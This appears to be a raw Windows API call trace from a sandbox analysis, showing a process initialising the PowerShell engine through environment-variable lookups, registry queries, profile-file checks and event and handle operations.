	[0295.718] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da25b8*="Available", lpRawData=0x2da2348) returned 1
	[0295.811] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.811] CoTaskMemFree (pv=0x4ae780) 
	[0295.811] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.811] CoTaskMemFree (pv=0x4ae780) 
	[0295.813] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.813] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0295.813] CoTaskMemFree (pv=0x4ae780) 
	[0295.813] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.813] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0295.813] CoTaskMemFree (pv=0x4ae780) 
	[0295.815] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x3b0) returned 0x0
	[0295.815] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d39c, lpData=0x0, lpcbData=0x20d398*=0x0 | out: lpType=0x20d39c*=0x1, lpData=0x0, lpcbData=0x20d398*=0x56) returned 0x0
	[0295.815] CoTaskMemAlloc (cb=0x5a) returned 0x1b786570
	[0295.815] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d36c, lpData=0x1b786570, lpcbData=0x20d368*=0x56 | out: lpType=0x20d36c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d368*=0x56) returned 0x0
	[0295.815] CoTaskMemFree (pv=0x1b786570) 
	[0295.815] RegCloseKey (hKey=0x3b0) returned 0x0
	[0295.816] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.816] CoTaskMemFree (pv=0x4ae780) 
	[0295.827] VirtualQuery (in: lpAddress=0x20b470, lpBuffer=0x20c330, dwLength=0x30 | out: lpBuffer=0x20c330*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.828] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.828] CoTaskMemFree (pv=0x4ae780) 
	[0295.829] VirtualQuery (in: lpAddress=0x20b470, lpBuffer=0x20c330, dwLength=0x30 | out: lpBuffer=0x20c330*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.833] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.833] CoTaskMemFree (pv=0x4ae780) 
	[0295.833] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.833] CoTaskMemFree (pv=0x4ae780) 
	[0295.834] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.834] CoTaskMemFree (pv=0x4ae780) 
	[0295.835] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.835] CoTaskMemFree (pv=0x4ae780) 
	[0295.836] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.836] CoTaskMemFree (pv=0x4ae780) 
	[0295.837] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.837] CoTaskMemFree (pv=0x4ae780) 
	[0295.838] VirtualQuery (in: lpAddress=0x20b470, lpBuffer=0x20c330, dwLength=0x30 | out: lpBuffer=0x20c330*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.838] VirtualQuery (in: lpAddress=0x20b470, lpBuffer=0x20c330, dwLength=0x30 | out: lpBuffer=0x20c330*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.570] VirtualQuery (in: lpAddress=0x20b470, lpBuffer=0x20c330, dwLength=0x30 | out: lpBuffer=0x20c330*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.572] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0296.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.573] CoTaskMemFree (pv=0x4ae780) 
	[0298.700] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x4ae890
	[0298.702] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x4ae9a0
	[0302.621] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0302.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.621] CoTaskMemFree (pv=0x4aeab0) 
	[0302.623] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0302.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.623] CoTaskMemFree (pv=0x4aeab0) 
	[0303.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.166] VirtualQuery (in: lpAddress=0x20b720, lpBuffer=0x20c5e0, dwLength=0x30 | out: lpBuffer=0x20c5e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.167] VirtualQuery (in: lpAddress=0x20b720, lpBuffer=0x20c5e0, dwLength=0x30 | out: lpBuffer=0x20c5e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.167] VirtualQuery (in: lpAddress=0x20af70, lpBuffer=0x20be30, dwLength=0x30 | out: lpBuffer=0x20be30*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.167] VirtualQuery (in: lpAddress=0x20af70, lpBuffer=0x20be30, dwLength=0x30 | out: lpBuffer=0x20be30*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.168] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d578 | out: phkResult=0x20d578*=0x2e4) returned 0x0
	[0303.168] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d4fc, lpData=0x0, lpcbData=0x20d4f8*=0x0 | out: lpType=0x20d4fc*=0x1, lpData=0x0, lpcbData=0x20d4f8*=0x56) returned 0x0
	[0303.168] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a7130
	[0303.168] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d4cc, lpData=0x1b7a7130, lpcbData=0x20d4c8*=0x56 | out: lpType=0x20d4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d4c8*=0x56) returned 0x0
	[0303.168] CoTaskMemFree (pv=0x1b7a7130) 
	[0303.169] RegCloseKey (hKey=0x2e4) returned 0x0
	[0303.169] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d578 | out: phkResult=0x20d578*=0x2e4) returned 0x0
	[0303.169] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d4fc, lpData=0x0, lpcbData=0x20d4f8*=0x0 | out: lpType=0x20d4fc*=0x1, lpData=0x0, lpcbData=0x20d4f8*=0x56) returned 0x0
	[0303.169] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a7130
	[0303.169] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d4cc, lpData=0x1b7a7130, lpcbData=0x20d4c8*=0x56 | out: lpType=0x20d4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d4c8*=0x56) returned 0x0
	[0303.169] CoTaskMemFree (pv=0x1b7a7130) 
	[0303.169] RegCloseKey (hKey=0x2e4) returned 0x0
	[0303.169] CoTaskMemAlloc (cb=0x20c) returned 0x1b776970
	[0303.170] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b776970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.170] CoTaskMemFree (pv=0x1b776970) 
	[0303.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.170] CoTaskMemAlloc (cb=0x20c) returned 0x1b776970
	[0303.170] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b776970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.170] CoTaskMemFree (pv=0x1b776970) 
	[0303.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0303.171] SetErrorMode (uMode=0x1) returned 0x1
	[0303.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d4e0 | out: lpFileInformation=0x20d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.171] SetErrorMode (uMode=0x1) returned 0x1
	[0303.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0303.171] SetErrorMode (uMode=0x1) returned 0x1
	[0303.172] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d4e0 | out: lpFileInformation=0x20d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.172] SetErrorMode (uMode=0x1) returned 0x1
	[0303.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0303.172] SetErrorMode (uMode=0x1) returned 0x1
	[0303.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d4e0 | out: lpFileInformation=0x20d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.172] SetErrorMode (uMode=0x1) returned 0x1
	[0303.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0303.172] SetErrorMode (uMode=0x1) returned 0x1
	[0303.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d4e0 | out: lpFileInformation=0x20d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.172] SetErrorMode (uMode=0x1) returned 0x1
	[0303.174] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0303.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.174] CoTaskMemFree (pv=0x4aeab0) 
	[0303.175] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0303.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.175] CoTaskMemFree (pv=0x4aeab0) 
	[0303.177] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0303.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.177] CoTaskMemFree (pv=0x4aeab0) 
	[0303.179] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0303.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.179] CoTaskMemFree (pv=0x4aeab0) 
	[0303.184] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0303.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.184] CoTaskMemFree (pv=0x4aeab0) 
	[0303.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4
	[0303.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c
	[0303.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4
	[0303.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0303.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
	[0303.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0303.186] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0303.186] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0303.186] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320
	[0303.186] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0303.186] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0303.186] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0303.188] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0303.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.188] CoTaskMemFree (pv=0x4aeab0) 
	[0303.191] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0303.192] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x20d6c0 | out: lpMode=0x20d6c0) returned 1
	[0304.343] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0304.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.343] CoTaskMemFree (pv=0x4aeab0) 
	[0304.347] SetEvent (hEvent=0x1cc) returned 1
	[0304.347] SetEvent (hEvent=0x2e4) returned 1
	[0304.347] SetEvent (hEvent=0x39c) returned 1
	[0304.347] SetEvent (hEvent=0x1c4) returned 1
	[0304.347] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0304.349] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0304.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.349] CoTaskMemFree (pv=0x4aeab0) 
	[0304.350] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d418 | out: phkResult=0x20d418*=0x3a4) returned 0x0
	[0304.350] RegQueryValueExW (in: hKey=0x3a4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x20d39c, lpData=0x0, lpcbData=0x20d398*=0x0 | out: lpType=0x20d39c*=0x0, lpData=0x0, lpcbData=0x20d398*=0x0) returned 0x2

Thread:
	id = 38
	os_tid = 0x63c


Thread:
	id = 43
	os_tid = 0x6e8


Thread:
	id = 51
	os_tid = 0x410


Thread:
	id = 58
	os_tid = 0x9b4


Thread:
	id = 64
	os_tid = 0x8ec

	[0241.364] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0267.856] LocalFree (hMem=0x407290) returned 0x0
	[0267.856] CloseHandle (hObject=0x320) returned 1
	[0267.856] CloseHandle (hObject=0x13) returned 1
	[0267.856] CloseHandle (hObject=0xf) returned 1
	[0267.857] RegCloseKey (hKey=0x30c) returned 0x0
	[0267.857] RegCloseKey (hKey=0x308) returned 0x0
	[0267.857] RegCloseKey (hKey=0x304) returned 0x0
	[0267.857] LocalFree (hMem=0x407260) returned 0x0
	[0267.857] RegCloseKey (hKey=0x330) returned 0x0
	[0283.144] RegCloseKey (hKey=0x1c4) returned 0x0
	[0292.590] RegCloseKey (hKey=0x390) returned 0x0
	[0292.590] RegCloseKey (hKey=0x38c) returned 0x0
	[0292.591] RegCloseKey (hKey=0x388) returned 0x0
	[0292.591] RegCloseKey (hKey=0x384) returned 0x0
	[0292.591] RegCloseKey (hKey=0x380) returned 0x0
	[0292.591] RegCloseKey (hKey=0x37c) returned 0x0
	[0292.592] RegCloseKey (hKey=0x378) returned 0x0
	[0292.592] RegCloseKey (hKey=0x350) returned 0x0
	[0292.592] RegCloseKey (hKey=0x3ac) returned 0x0
	[0292.592] RegCloseKey (hKey=0x3a8) returned 0x0
	[0292.593] RegCloseKey (hKey=0x370) returned 0x0
	[0292.593] RegCloseKey (hKey=0x36c) returned 0x0
	[0292.593] RegCloseKey (hKey=0x368) returned 0x0
	[0292.593] RegCloseKey (hKey=0x364) returned 0x0
	[0292.594] RegCloseKey (hKey=0x360) returned 0x0
	[0292.594] RegCloseKey (hKey=0x35c) returned 0x0
	[0292.594] RegCloseKey (hKey=0x358) returned 0x0
	[0292.594] RegCloseKey (hKey=0x354) returned 0x0
	[0292.595] RegCloseKey (hKey=0x3a4) returned 0x0
	[0292.595] RegCloseKey (hKey=0x344) returned 0x0
	[0292.595] RegCloseKey (hKey=0x340) returned 0x0
	[0292.595] RegCloseKey (hKey=0x33c) returned 0x0
	[0292.596] RegCloseKey (hKey=0x338) returned 0x0
	[0292.596] RegCloseKey (hKey=0x320) returned 0x0
	[0292.596] RegCloseKey (hKey=0x30c) returned 0x0
	[0292.596] RegCloseKey (hKey=0x308) returned 0x0
	[0292.597] RegCloseKey (hKey=0x304) returned 0x0
	[0292.597] RegCloseKey (hKey=0x3a0) returned 0x0
	[0292.597] RegCloseKey (hKey=0x1cc) returned 0x0
	[0292.597] RegCloseKey (hKey=0x1c4) returned 0x0
	[0292.597] RegCloseKey (hKey=0x39c) returned 0x0
	[0292.598] RegCloseKey (hKey=0x398) returned 0x0
	[0292.598] RegCloseKey (hKey=0x374) returned 0x0
	[0292.598] RegCloseKey (hKey=0x3b0) returned 0x0
	[0641.569] RegCloseKey (hKey=0x3a4) returned 0x0

Thread:
	id = 156
	os_tid = 0xb9c


Thread:
	id = 246
	os_tid = 0xd1c

	[0305.359] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0305.363] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0305.367] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0305.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.367] CoTaskMemFree (pv=0x4aeab0) 
	[0305.369] VirtualQuery (in: lpAddress=0x1c8cd9c0, lpBuffer=0x1c8ce880, dwLength=0x30 | out: lpBuffer=0x1c8ce880*(BaseAddress=0x1c8cd000, AllocationBase=0x1bf40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0305.372] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0305.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.372] CoTaskMemFree (pv=0x4aeab0) 
	[0305.375] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0305.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.375] CoTaskMemFree (pv=0x4aeab0) 
	[0305.378] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0305.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.378] CoTaskMemFree (pv=0x4aeab0) 
	[0305.396] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0305.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.396] CoTaskMemFree (pv=0x4aeab0) 
	[0305.398] CoTaskMemAlloc (cb=0x104) returned 0x4aeab0
	[0305.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4aeab0, nSize=0x80 | out: lpBuffer="") returned 0x0
